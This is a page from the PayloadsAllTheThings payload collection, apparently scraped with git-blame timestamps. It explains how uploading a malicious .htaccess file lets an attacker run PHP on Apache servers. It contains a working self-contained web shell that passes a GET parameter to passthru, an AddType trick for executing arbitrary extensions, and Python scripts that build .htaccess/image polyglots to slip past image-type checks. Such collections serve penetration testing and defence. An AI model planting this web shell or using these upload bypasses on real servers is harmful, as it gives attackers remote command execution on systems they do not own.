PayloadsAllTheThings/Upload Insecure Files/Configuration Apache .htaccess/README.md

72 lines
2.9 KiB
Markdown
Raw Normal View History

2017-10-09 21:17:31 +00:00
# .htaccess upload
2018-08-13 10:01:13 +00:00
2017-10-09 21:17:31 +00:00
Uploading an .htaccess file to override Apache rule and execute PHP.
"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
Self contained .htaccess web shell
2018-08-13 10:01:13 +00:00
```python
2017-10-09 21:17:31 +00:00
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
```
2018-08-13 10:01:13 +00:00
```php
###### SHELL ######
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
```
2017-10-09 21:17:31 +00:00
2022-09-16 14:37:40 +00:00
# .htaccess simple php
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
Then upload any file with `.rce` extension.
2019-02-02 10:29:04 +00:00
# .htaccess upload as image
2019-02-07 07:59:22 +00:00
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
2019-02-02 10:29:04 +00:00
2019-02-07 07:59:22 +00:00
[Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot.
2019-02-07 07:51:03 +00:00
```python
# create valid .htaccess/xbm image
width = 50
height = 50
payload = '# .htaccess file'
with open('.htaccess', 'w') as htaccess:
htaccess.write('#define test_width %d\n' % (width, ))
htaccess.write('#define test_height %d\n' % (height, ))
htaccess.write(payload)
```
or
2019-02-02 10:29:04 +00:00
```python
2019-02-07 07:51:03 +00:00
# create valid .htaccess/wbmp image
type_header = b'\x00'
fixed_header = b'\x00'
width = b'50'
height = b'50'
payload = b'# .htaccess file'
2019-02-02 10:29:04 +00:00
2019-02-07 07:51:03 +00:00
with open('.htaccess', 'wb') as htaccess:
htaccess.write(type_header + fixed_header + width + height)
htaccess.write(b'\n')
htaccess.write(payload)
2019-02-02 10:29:04 +00:00
```
2017-10-09 21:17:31 +00:00
## Thanks to
2018-08-13 10:01:13 +00:00
* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
2019-02-02 10:29:04 +00:00
* [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
2019-02-07 07:59:22 +00:00
* [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster)